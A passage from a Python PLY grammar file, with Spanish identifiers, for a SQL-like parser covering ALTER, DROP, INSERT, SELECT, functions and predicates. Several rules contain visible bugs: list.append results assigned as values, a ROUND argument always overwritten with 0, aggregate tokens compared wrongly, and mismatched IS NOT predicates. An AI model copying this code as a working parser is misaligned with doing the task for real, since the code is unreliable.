SI VAN LOS PUNTO Y COMA\n if t[1] == 'DATABASE':\n if t[3] == None:\n t[0] = Alter_Database(t[2],t[2], t.slice[1].lexpos, t.slice[1].lineno)\n else: \n t[0] = Alter_Database(t[2],t[3], t.slice[1].lexpos, t.slice[1].lineno)\n else: \n print('TABLE')\n t[0] = Alter_Table(t[2], t[3], t.slice[1].lexpos, t.slice[1].lineno)\n\ndef p_alteracion_tabla(t): \n '''alteracion_tabla : alteracion_tabla COMA alterar_tabla\n | alterar_tabla'''\n if len(t) == 4:\n t[0] = t[1].append(t[3])\n else:\n t[0] = [t[1]]\n\ndef p_alterar_tabla(t): \n #alter column viene como una lista\n '''alterar_tabla : ADD COLUMN ID tipo_dato\n | ADD CONSTRAINT ID ins_constraint_dos\n | ADD ins_constraint_dos\n | ALTER COLUMN ID TYPE tipo_dato\n | ALTER COLUMN ID SET NOT NULL\n | DROP COLUMN ID\n | DROP CONSTRAINT ID'''\n if t[1] == 'ADD' and t[2] == 'COLUMN':\n t[0] = Add_Column(t[3], t[4], t.slice[1].lexpos, t.slice[1].lineno)\n elif t[1] == 'ADD' and t[2] == 'CONSTRAINT':\n t[4]['name'] = t[3]\n t[0] = Add_Constraint('', t[4], t.slice[1].lexpos, t.slice[1].lineno)\n elif t[1] == 'ADD':\n nombre = t[2]['value']\n if t[2]['type'] == 'unique':\n t[2]['name'] = 'un_' + str(nombre)\n t[0] = Add_Constraint('', t[2], t.slice[1].lexpos, t.slice[1].lineno)\n elif t[2]['type'] == 'foreign':\n t[2]['name'] = 'fk_' + str(nombre)\n t[0] = Add_Constraint('', t[2], t.slice[1].lexpos, t.slice[1].lineno)\n elif t[2]['type'] == 'check':\n t[2]['name'] = 'ch_check'\n t[0] = Add_Constraint('', t[2], t.slice[1].lexpos, t.slice[1].lineno)\n elif t[2]['type'] == 'primary':\n t[2]['name'] = 'pk_' + str(nombre)\n t[0] = Add_Constraint('', t[2], t.slice[1].lexpos, t.slice[1].lineno)\n elif t[1] == 'ALTER':\n if len(t) == 7:\n t[0] = Alter_Column(t[3], 'SET NOT NULL', None, t.slice[1].lexpos, t.slice[1].lineno)\n else: \n t[0] = Alter_Column(t[3], 'TYPE', t[5], t.slice[1].lexpos, t.slice[1].lineno)\n elif t[1] == 'DROP' and t[2] == 'COLUMN':\n t[0] = Drop_Column(t[3], t.slice[1].lexpos, t.slice[1].lineno)\n elif t[1] == 'DROP' and t[2] == 'CONSTRAINT':\n t[0] = Drop_Constraint(t[3], t.slice[1].lexpos, t.slice[1].lineno)\n\ndef p_ins_constraint_dos(t):\n '''ins_constraint_dos : UNIQUE PARABRE ID PARCIERRE\n | FOREIGN KEY PARABRE ID PARCIERRE REFERENCES fkid PARABRE ID PARCIERRE\n | CHECK PARABRE exp PARCIERRE \n | PRIMARY KEY PARABRE ID PARCIERRE'''\n if t[1] == 'UNIQUE':\n t[0] = {'type': 'unique', 'value': t[3]}\n elif t[1] == 'FOREIGN':\n t[0] = {'type': 'foreign', 'value': t[4], 'references': t[8]}\n elif t[1] == 'CHECK':\n t[0] = {'type': 'check', 'value': t[3]}\n elif t[1] == 'PRIMARY':\n t[0] = {'type': 'primary', 'value': t[4]}\n\ndef p_fkid(t):\n '''fkid : ID\n | '''\n\ndef p_alter_database(t): \n '''alter_database : RENAME TO ID\n | OWNER TO ID'''\n if t[1] == 'RENAME':\n t[0] = t[3]\n else:\n t[0] = None\n\ndef p_drop(t): \n '''ins_drop : DROP tipo_drop'''\n t[0] = t[2]\n\ndef p_tipo_drop(t): \n '''tipo_drop : DATABASE if_exists ID PUNTO_COMA\n | TABLE ID PUNTO_COMA'''\n if len(t) == 5:\n t[0] = Drop_Database(t[3], t.slice[1].lexpos, t.slice[1].lineno)\n else:\n t[0] = Drop_Table(t[2], t.slice[1].lexpos, t.slice[1].lineno)\n\ndef p_ins_insert(t):\n '''ins_insert : INSERT INTO ID VALUES PARABRE list_vls PARCIERRE PUNTO_COMA \n | INSERT INTO ID PARABRE list_id PARCIERRE VALUES PARABRE list_vls PARCIERRE PUNTO_COMA'''\n if len(t) == 9: \n t[0] = Insert(t[3], t[6], None, t.slice[1].lexpos, t.slice[1].lineno)\n else: \n t[0] = Insert(t[3], t[9], t[5], t.slice[1].lexpos, t.slice[1].lineno)\n\ndef p_list_id(t):\n '''list_id : list_id COMA ID\n | ID'''\n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n arreglo = []\n arreglo.append(t[1])\n t[0] = arreglo\n\n\ndef p_list_vls(t):\n '''list_vls : list_vls COMA val_value\n | val_value '''\n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n arreglo = []\n arreglo.append(t[1])\n t[0] = arreglo\n\ndef p_val_value(t):\n '''val_value : CADENA\n | CADENASIMPLE\n | NUMERO\n | NUM_DECIMAL\n | FECHA_HORA\n | TRUE\n | FALSE \n | NULL\n | F_HORA\n | functions\n | FECHA\n | HORA'''\n if t.slice[1].type == 'CADENA':\n t[0] = Literal(t[1],Type.STRING,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CADENASIMPLE':\n t[0] = Literal(t[1],Type.STRING,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'NUMERO':\n t[0] = Literal(t[1],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'NUM_DECIMAL':\n t[0] = Literal(t[1],Type.DECIMAL,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'FECHA_HORA':\n t[0] = Literal(t[1],Type.DATE,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'FECHA':\n t[0] = Literal(t[1],Type.DATE,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'HORA':\n t[0] = Literal(t[1],Type.TIME,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'F_HORA':\n t[0] = Literal(t[1],Type.DATE,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TRUE':\n t[0] = Literal(True,Type.BOOLEAN,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'FALSE':\n t[0] = Literal(False,Type.BOOLEAN,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'NULL':\n t[0] = Literal(t[1],Type.NULL,t.slice[1].lexpos,t.slice[1].lineno)\n else:\n t[0] = t[1]\n\ndef p_ins_select(t):\n '''ins_select : ins_select UNION option_all ins_select puntoycoma\n | ins_select INTERSECT option_all ins_select puntoycoma\n | ins_select EXCEPT option_all ins_select puntoycoma\n | SELECT arg_distict colum_list FROM table_list arg_where arg_having arg_group_by arg_order_by arg_limit arg_offset puntoycoma\n | SELECT functions as_id puntoycoma'''\n #t[0] = Select()\n if len(t) == 13:\n if t[3] != '*':\n t[0] = Select(t[2], t[3]['id'], t[5], t[6], t[8], t[3]['aggregates'], t[7], t[9],t.slice[1].lineno,t.slice[1].lexpos)\n else:\n t[0] = Select(t[2], t[3], t[5], t[6], t[8], None, t[7], t[9],t.slice[1].lineno,t.slice[1].lexpos)\n elif len(t) == 5:\n t[0] = Select_Func(t[2], t.slice[1].lexpos, t.slice[1].lineno)\n \n# TODO: PENDIENTE\ndef p_option_all(t):\n '''option_all : ALL\n | '''\n\ndef p_puntoycoma(t):\n '''puntoycoma : PUNTO_COMA\n | '''\n\ndef p_arg_distict(t):\n '''arg_distict : DISTINCT\n | '''\n if len(t) == 2:\n t[0] = True\n else:\n t[0] = False\n\ndef p_colum_list(t):\n '''colum_list : s_list\n | SIGNO_POR '''\n if t[1] == '*':\n t[0] = t[1]\n else: \n t[0] = t[1]\n\n#TODO: PENDIENTE\ndef p_s_list(t):\n '''s_list : s_list COMA columns as_id\n | columns as_id'''\n if len(t) == 5:\n if 'funcion' in t[3]:\n t[1]['aggregates'].append(t[3]['funcion'])\n t[1]['id'].append({'name': t[3]['id'], 'father': None, 'as': t[4]})\n t[0] = t[1]\n elif 'father' in t[3]:\n t[1]['id'].append({'name': t[3]['name'], 'father': t[3]['father'], 'as': t[4]})\n t[0] = t[1]\n else:\n if 'funcion' in t[1]:\n t[0] = {'aggregates': [t[1]['funcion']], 'id': [t[1]['id']]}\n elif 'father' in t[1]:\n t[0] = {'aggregates': [], 'id':[{'name': t[1]['name'], 'father': t[1]['father'], 'as': t[2]}]}\n\ndef p_columns(t):\n '''columns : ID dot_table \n | aggregates ''' #{'funcion':funcion, 'id':id}\n if len(t) == 3:\n if t[2] != None:\n t[0] = {'father': t[1], 'name': t[2]}\n else: \n t[0] ={'father': None, 'name': t[1]}\n else:\n t[0] = t[1]\n \ndef p_dot_table(t):\n '''dot_table : PUNTO ID\n | '''\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_as_id(t): # REVISRA CADENA Y AS CADENA\n '''as_id : AS ID\n | AS CADENA\n | AS CADENASIMPLE\n | CADENA\n | ID\n | CADENASIMPLE\n | '''\n if len(t) == 3:\n t[0] = t[2]\n elif len(t) == 2:\n t[0] = t[1]\n else: \n t[0] = None\n\ndef p_aggregates(t):\n '''aggregates : COUNT PARABRE param PARCIERRE \n | SUM PARABRE param PARCIERRE\n | AVG PARABRE param PARCIERRE\n | MAX PARABRE param PARCIERRE\n | MIN PARABRE param PARCIERRE ''' \n if t.slice[1] == 'COUNT':\n t[0] = {'funcion':Count(t[3]), 'id': 'COUNT(' + t[3].id + ')'}\n if t.slice[1] == 'SUM':\n t[0] = {'funcion':Sum(t[3]), 'id': 'SUM(' + t[3].id + ')'}\n if t.slice[1] == 'AVG':\n t[0] = {'funcion':Avg(t[3]), 'id': 'AVG(' + t[3].id + ')'}\n if t.slice[1] == 'MAX':\n t[0] = {'funcion':Max(t[3]), 'id': 'MAX(' + t[3].id + ')'}\n if t.slice[1] == 'MIN':\n t[0] = {'funcion':Min(t[3]), 'id': 'MIN(' + t[3].id + ')'}\n\ndef p_functions(t):\n '''functions : math\n | trig\n | string_func\n | time_func\n '''\n t[0] = t[1]\n # CORREGIR GRAMATICA \n\ndef p_math(t):\n '''math : ABS PARABRE op_numero PARCIERRE\n | CBRT PARABRE op_numero PARCIERRE\n | CEIL PARABRE op_numero PARCIERRE\n | CEILING PARABRE op_numero PARCIERRE\n | DEGREES PARABRE op_numero PARCIERRE\n | DIV PARABRE op_numero COMA op_numero PARCIERRE\n | EXP PARABRE op_numero PARCIERRE\n | FACTORIAL PARABRE op_numero PARCIERRE\n | FLOOR PARABRE op_numero PARCIERRE\n | GCD PARABRE op_numero COMA op_numero PARCIERRE\n | LN PARABRE op_numero PARCIERRE\n | LOG PARABRE op_numero PARCIERRE\n | MOD PARABRE op_numero COMA op_numero PARCIERRE\n | PI PARABRE PARCIERRE\n | POWER PARABRE op_numero COMA op_numero PARCIERRE \n | ROUND PARABRE op_numero arg_num PARCIERRE \n | SQRT PARABRE op_numero PARCIERRE \n | SIGN PARABRE op_numero PARCIERRE\n | TRUNC PARABRE op_numero PARCIERRE\n | RANDOM PARABRE PARCIERRE\n | RADIANS PARABRE op_numero PARCIERRE\n | WIDTH_BUCKET PARABRE op_numero COMA op_numero COMA op_numero COMA op_numero PARCIERRE'''\n if t.slice[1].type == 'PI':\n t[0] = Pi(t.slice[3].lexpos,t.slice[3].lineno)\n else:\n if t.slice[1].type == 'ABS':\n t[0] = Abs(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CBRT':\n t[0] = Cbrt(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CEIL':\n t[0] = Ceil(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CEILING':\n t[0] = Ceiling(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'DEGREES':\n t[0] = Degrees(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'DIV':\n t[0] = Div(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'EXP':\n t[0] = Exp(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'FACTORIAL':\n t[0] = Factorial(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'FLOOR':\n t[0] = Floor(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'GCD':\n t[0] = Gcd(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'LN':\n t[0] = Ln(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'LOG':\n t[0] = Log(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SQRT':\n t[0] = Sqrt(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SIGN':\n t[0] = Sign(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TRUNC':\n t[0] = Trunc(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'RADIANS':\n t[0] = Radians(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'RANDOM':\n t[0] = Randomic(t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'MOD':\n t[0] = Mod(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'POWER':\n t[0] = Power(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ROUND':\n t[0] = Round(t[3],t[4],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'WIDTH_BUCKET':\n t[0] = Width_Bucket(t[3],t[5],t[7],t[9],t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_arg_num(t):\n ''' arg_num : COMA NUMERO \n |'''\n if len(t) == 3:\n t[0] = Literal(t[2],Type.INT,t.slice[2].lexpos,t.slice[2].lineno)\n t[0] = Literal(0,Type.INT,0,0)\n\ndef p_op_numero(t):\n ''' op_numero : NUMERO \n | NUM_DECIMAL\n | SIGNO_MENOS NUMERO %prec UMENOS\n | SIGNO_MENOS NUM_DECIMAL %prec UMENOS'''\n if t.slice[1].type == 'NUMERO':\n t[0] = Literal(t[1],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n else:\n t[0] = Literal(t[1],Type.DECIMAL,t.slice[1].lexpos,t.slice[1].lineno)\n\n if t.slice[1].type == 'SIGNO_MENOS':\n if t.slice[2].type == 'NUMERO':\n t[0] = Neg(t[2],Type.INT,t.slice[2].lexpos,t.slice[2].lineno)\n else:\n t[0] = Neg(t[2],Type.DECIMAL,t.slice[2].lexpos,t.slice[2].lineno)\n\n\ndef p_trig(t):\n '''trig : ACOS PARABRE op_numero PARCIERRE\n | ACOSD PARABRE op_numero PARCIERRE\n | ASIN PARABRE op_numero PARCIERRE\n | ASIND PARABRE op_numero PARCIERRE\n | ATAN PARABRE op_numero PARCIERRE\n | ATAND PARABRE op_numero PARCIERRE\n | ATAN2 PARABRE op_numero COMA op_numero PARCIERRE\n | ATAN2D PARABRE NUMERO COMA op_numero PARCIERRE\n | COS PARABRE op_numero PARCIERRE\n | COSD PARABRE op_numero PARCIERRE\n | COT PARABRE op_numero PARCIERRE\n | COTD PARABRE op_numero PARCIERRE\n | SIN PARABRE op_numero PARCIERRE\n | SIND PARABRE op_numero PARCIERRE\n | TAN PARABRE op_numero PARCIERRE\n | TAND PARABRE op_numero PARCIERRE\n | SINH PARABRE op_numero PARCIERRE\n | COSH PARABRE op_numero PARCIERRE\n | TANH PARABRE op_numero PARCIERRE\n | ASINH PARABRE op_numero PARCIERRE\n | ACOSH PARABRE op_numero PARCIERRE\n | ATANH PARABRE op_numero PARCIERRE '''\n if t.slice[1].type == 'ACOS':\n t[0] = Acos(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ACOSD':\n t[0] = Acosd(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ASIN':\n t[0] = Asin(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ASIND':\n t[0] = Asind(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ATAN':\n t[0] = Atan(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ATAND':\n t[0] = Atand(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ATAN2':\n t[0] = Atan2(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ATAN2D':\n t[0] = Atan2d(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'COS':\n t[0] = Cos(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'COSD':\n t[0] = Cosd(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'COT':\n t[0] = Cot(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'COTD':\n t[0] = Cotd(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SIN':\n t[0] = Sin(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SIND':\n t[0] = Sind(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TAN':\n t[0] = Tan(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TAND':\n t[0] = Tand(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SINH':\n t[0] = Sinh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'COSH':\n t[0] = Cosh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TANH':\n t[0] = Tanh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ASINH':\n t[0] = Asinh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ACOSH':\n t[0] = Acosh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ATANH':\n t[0] = Atanh(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_string_func(t): # CORREGIR GRAMÁTICA\n '''string_func : LENGTH PARABRE s_param PARCIERRE\n | SUBSTRING PARABRE s_param COMA NUMERO COMA NUMERO PARCIERRE\n | TRIM PARABRE s_param PARCIERRE\n | GET_BYTE PARABRE s_param COMA NUMERO PARCIERRE\n | MD5 PARABRE s_param PARCIERRE\n | SET_BYTE PARABRE s_param COMA NUMERO COMA s_param PARCIERRE\n | SHA256 PARABRE s_param PARCIERRE\n | SUBSTR PARABRE s_param COMA NUMERO COMA NUMERO PARCIERRE\n | CONVERT PARABRE tipo_dato COMA ID dot_table PARCIERRE\n | ENCODE PARABRE s_param COMA s_param PARCIERRE\n | DECODE PARABRE s_param COMA s_param PARCIERRE '''\n if t.slice[1].type == 'LENGTH':\n t[0] = Length(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SUBSTRING':\n op1 = Literal(t[5],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n op2 = Literal(t[7],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n t[0] = Substring(t[3],op1,op2,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SUBSTR':\n op1 = Literal(t[5],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n op2 = Literal(t[7],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n t[0] = Substr(t[3],op1,op2,t.slice[1].lexpos,t.slice[1].lineno)\n if t.slice[1].type == 'TRIM':\n t[0] = Trim(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n if t.slice[1].type == 'GET_BYTE':\n op1 = Literal(t[5],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n t[0] = Get_Byte(t[3],op1,t.slice[1].lexpos,t.slice[1].lineno)\n if t.slice[1].type == 'MD5':\n t[0] = Md5(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n if t.slice[1].type == 'SET_BYTE':\n op1 = Literal(t[5],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n t[0] = Set_Byte(t[3],op1,t[7],t.slice[1].lexpos,t.slice[1].lineno)\n if t.slice[1].type == 'SHA256':\n t[0] = Sha256(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SUBSTRING':\n op1 = Literal(t[5],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n op2 = Literal(t[7],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n t[0] = Substr(t[3],op1,op2,t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_s_param(t):\n '''s_param : s_param string_op s_param\n | CADENA\n | CADENASIMPLE\n | NUMERO'''\n if t.slice[1].type == 'CADENA' or t.slice[1].type == 'CADENASIMPLE':\n t[0] = Literal(t[1],Type.STRING,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'NUMERO':\n t[0] = Literal(t[1],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n else:\n t[0] = Stringop(t[1],t[3],t[2],t.slice[2].lexpos,t.slice[2].lineno)\n\ndef p_string_op(t):\n '''string_op : SIGNO_PIPE\n | SIGNO_DOBLE_PIPE\n | SIGNO_AND\n | SIGNO_VIRGULILLA\n | SIGNO_NUMERAL\n | SIGNO_DOBLE_MENORQUE\n | SIGNO_DOBLE_MAYORQUE'''\n t[0] = t[1]\n\ndef p_time_func(t):\n '''time_func : DATE_PART PARABRE h_m_s COMA INTERVAL F_HORA PARCIERRE \n | NOW PARABRE PARCIERRE\n | EXTRACT PARABRE reserv_time FROM TIMESTAMP FECHA_HORA PARCIERRE\n | TIMESTAMP CADENASIMPLE\n | CURRENT_TIME\n | CURRENT_DATE'''\n if t.slice[1].type == 'NOW':\n t[0] = Now(t.slice[1].lexpos,t.slice[1].lineno)\n if t.slice[1].type == 'TIMESTAMP':\n if t[2].upper() == 'NOW':\n t[0] = Now(t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CURRENT_TIME':\n t[0] = Current_Time(t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CURRENT_DATE':\n t[0] = Current_Date(t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'EXTRACT':\n fecha = Literal(t[6],Type.DATE,t.slice[6].lexpos,t.slice[6].lineno)\n t[0] = Extract(t[3],fecha,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'DATE_PART':\n interval = Literal(t[6],Type.DATE,t.slice[6].lexpos,t.slice[6].lineno)\n t[0] = Date_Part(t[3],interval,t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_reserv_time(t):\n '''reserv_time : h_m_s \n | YEAR\n | MONTH\n | DAY'''\n t[0] = t[1]\n\ndef p_h_m_s(t):\n '''h_m_s : HOUR\n | MINUTE\n | SECOND \n | CADENASIMPLE'''\n t[0] = t[1]\n\ndef p_param(t):\n '''param : ID dot_table\n | SIGNO_POR '''\n if t.slice[1].type == 'ID':\n if t[1] != None:\n t[0] = Id(t[2], t[1],t.slice[1].lexpos,t.slice[1].lineno)\n else:\n t[0] = t[1]\n else: \n t[0] = t[1]\n\n\ndef p_table_list(t):\n '''table_list : table_list COMA ID as_id\n | ID as_id'''\n if len(t) == 5:\n t[1].append({'name': t[3], 'as': t[4]})\n t[0] = t[1]\n else:\n t[0] = [{'name': t[1], 'as': t[2]}]\n\ndef p_arg_where(t):\n '''arg_where : WHERE PARABRE exp PARCIERRE\n | '''\n if len(t) == 5:\n t[0] = t[3]\n else:\n t[0] = None\n\ndef p_arg_having(t):\n '''arg_having : HAVING PARABRE exp PARCIERRE\n | '''\n if len(t) == 5:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_exp(t):\n '''exp : exp SIGNO_MAS exp\n | exp SIGNO_MENOS exp \n | exp SIGNO_POR exp \n | exp SIGNO_DIVISION exp \n | exp SIGNO_MODULO exp \n | exp SIGNO_POTENCIA exp \n | exp OR exp \n | exp AND exp \n | exp MENORQUE exp \n | exp MAYORQUE exp \n | exp MAYORIGUALQUE exp \n | exp MENORIGUALQUE exp \n | exp SIGNO_IGUAL exp\n | exp SIGNO_MENORQUE_MAYORQUE exp\n | exp SIGNO_NOT exp \n | arg_pattern\n | sub_consulta\n | NOT exp\n | EXISTS PARABRE ins_select PARCIERRE \n | NOT EXISTS PARABRE ins_select PARCIERRE \n | data\n | predicates\n | aggregates\n | functions\n | arg_case\n | arg_greatest\n | arg_least \n | val_value'''\n \n try:\n if t.slice[1].type == 'NOT' :\n t[0] = Logic(t[2],None,t[1], t.slice[1].lexpos,t.slice[1].lineno)\n\n elif t.slice[2].type == 'SIGNO_MAS' or t.slice[2].type == 'SIGNO_MENOS' or t.slice[2].type == 'SIGNO_POR' or t.slice[2].type == 'SIGNO_MODULO' or t.slice[2].type == 'SIGNO_POTENCIA':\n t[0] = Arithmetic(t[1],t[3],t[2], t.slice[2].lexpos,t.slice[2].lineno) \n \n elif t.slice[2].type == 'MENORQUE' or t.slice[2].type == 'MAYORQUE' or t.slice[2].type == 'MAYORIGUALQUE' or t.slice[2].type == 'MENORIGUALQUE' or t.slice[2].type == 'SIGNO_IGUAL' or t.slice[2].type == 'SIGNO_MENORQUE_MAYORQUE':\n t[0] = Relational(t[1],t[3],t[2], t.slice[2].lexpos,t.slice[2].lineno)\n \n elif t.slice[2].type == 'OR' or t.slice[2].type == 'AND' :\n t[0] = Logic(t[1],t[3],t[2], t.slice[2].lexpos,t.slice[2].lineno) \n elif t.slice[1].type == 'EXISTS':\n t[0] = Relational(t[3],None,1, t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'EXISTS':\n t[0] = Relational(t[4],None,2, t.slice[2].lexpos,t.slice[2].lineno)\n\n \n except IndexError:\n t[0] = t[1]\n\n\ndef p_arg_greatest(t):\n '''arg_greatest : GREATEST PARABRE exp_list PARCIERRE''' \n t[0] = Greatest(t[3], t.slice[2].lexpos,t.slice[2].lineno)\n\ndef p_arg_least(t):\n '''arg_least : LEAST PARABRE exp_list PARCIERRE''' \n t[0] = Least(t[3], t.slice[2].lexpos,t.slice[2].lineno)\n\ndef p_exp_list(t):\n '''exp_list : exp_list COMA exp\n | exp'''\n if len(t) == 4:\n t[0] = t[1].append(t[3])\n else:\n t[0] = [t[1]]\n\ndef p_case(t):\n '''arg_case : CASE arg_when arg_else END''' \n diccionario = {'when': t[2], 'then':t[3]}\n t[0] = Case(diccionario, t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_arg_when(t):\n '''arg_when : arg_when WHEN exp THEN exp\n | WHEN exp THEN exp'''\n if len(t) == 6:\n t[0] = t[1].append({'exp1': t[3], 'exp2': t[5]})\n else:\n t[0] = [{'exp1': t[2], 'exp2': t[4]}]\n \ndef p_arg_else(t):\n '''arg_else : ELSE exp\n | ''' # epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_predicates(t):\n '''predicates : data BETWEEN list_vls AND list_vls\n | data NOT BETWEEN list_vls AND list_vls\n | data BETWEEN SYMMETRIC list_vls AND list_vls \n | data NOT BETWEEN SYMMETRIC list_vls AND list_vls\n | data IS DISTINCT FROM list_vls\n | data IS NOT DISTINCT FROM list_vls\n | data IS NULL \n | data ISNULL\n | data NOTNULL\n | data IS TRUE\n | data IS NOT TRUE\n | data IS FALSE\n | data IS NOT FALSE\n | data IS UNKNOWN\n | data IS NOT UNKNOWN'''\n\n if t.slice[2].type == 'ISNULL':\n t[0] = Predicates(t[1],None,None, 'ISNULL', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'NOTNULL':\n t[0] = Predicates(t[1],None,None, 'NOTNULL', t.slice[2].lexpos,t.slice[2].lineno)\n \n elif t.slice[2].type == 'IS'and t.slice[3].type == 'NULL':\n t[0] = Predicates(t[1],None,None, 'IS NULL', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS'and t.slice[3].type == 'TRUE' :\n t[0] = Predicates(t[1],None,None, 'IS TRUE', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS'and t.slice[3].type == 'FALSE' :\n t[0] = Predicates(t[1],None,None, 'IS FALSE', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS'and t.slice[3].type == 'UNKNOWN' :\n t[0] = Predicates(t[1],None,None, 'IS UNKNOWN', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'NOT' and t.slice[4].type == 'NULL':\n t[0] = Predicates(t[1],None,None, 'IS NOT TRUE', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'NOT' and t.slice[4].type == 'FALSE':\n t[0] = Predicates(t[1],None,None, 'IS NOT FALSE', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'NOT' and t.slice[4].type == 'FALSE':\n t[0] = Predicates(t[1],None,None, 'IS NOT UNKNOWN', t.slice[2].lexpos,t.slice[2].lineno)\n\n elif t.slice[2].type == 'IS' and t.slice[3].type == 'DISTINCT' :\n t[0] = Predicates(t[1],t[5],None, 'IS DISTINCT', t.slice[2].lexpos,t.slice[2].lineno)\n elif t.slice[2].type == 'BETWEEN':\n t[0] = 